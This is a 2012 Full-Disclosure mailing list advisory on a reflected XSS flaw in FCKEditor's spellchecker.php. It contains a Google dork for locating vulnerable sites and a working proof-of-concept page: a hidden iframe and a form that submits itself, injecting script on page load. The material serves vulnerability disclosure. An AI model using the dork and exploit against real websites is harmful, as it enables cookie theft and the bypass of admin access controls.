lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAHPiOv_c=-4oybkLF-_e5cCai3PmfmK-8CrgN1AaTy5h+d_EaA@mail.gmail.com>
Date: Fri, 22 Jun 2012 12:13:17 +0200
From: Emilio Pinna <ncl01@...il.it>
To: full-disclosure@...ts.grok.org.uk
Subject: FCKEditor reflected XSS vulnerability

# Product: FCKEditor
# Vendor site: http://ckeditor.com/
# Affected versions:  FCKEditor <= 2.6.7
# Product description: WYSIWYG Text and HTML Editor for the Web
# Author: Emilio Pinna - ncl 01 _at_ email _dot_ it
# Blog site: http://disse.cting.org
# Date: 13/06/2012

This software is a popular as stand-alone application as
WordPress/Joomla/Drupal extensions
and embedded as editor in of web applications. Developing is dismissed
from 2009 but was
spreaded for more than six years and Google counts more than 1,5
billion of results.

A plausbile Google dork filtering out PHP sources could be:

# inurl:fck_spellerpages/spellerpages/server-scripts/ -"The following variables"


File "spellchecker.php" suffer from XSS vulnerabilities in line 27.
Attackers can exploit
these weaknesses to execute arbitrary HTML and script code in a user's
browser session
that visit resulting in a cookie stealing and bypass of admin access
controls.  Exploit is
CRSF-like due to POST vulnerable parameter.

#--------- File: fsck_editor.html -----------#
<html>
<body>
<iframe style="width: 1px; height: 1px; visibility: hidden"
name="hidden"></iframe>
  <form method="post" name="sender"
   action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"
target="hidden">
   <input type="hidden" name="textinputs[]" value='");alert("THIS SITE
IS XSS VULNERABLE!");</script><!--' />
  </form>
</body>
<script>document.sender.submit(); </script>
</html>
#-----------------------------------------------------#

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ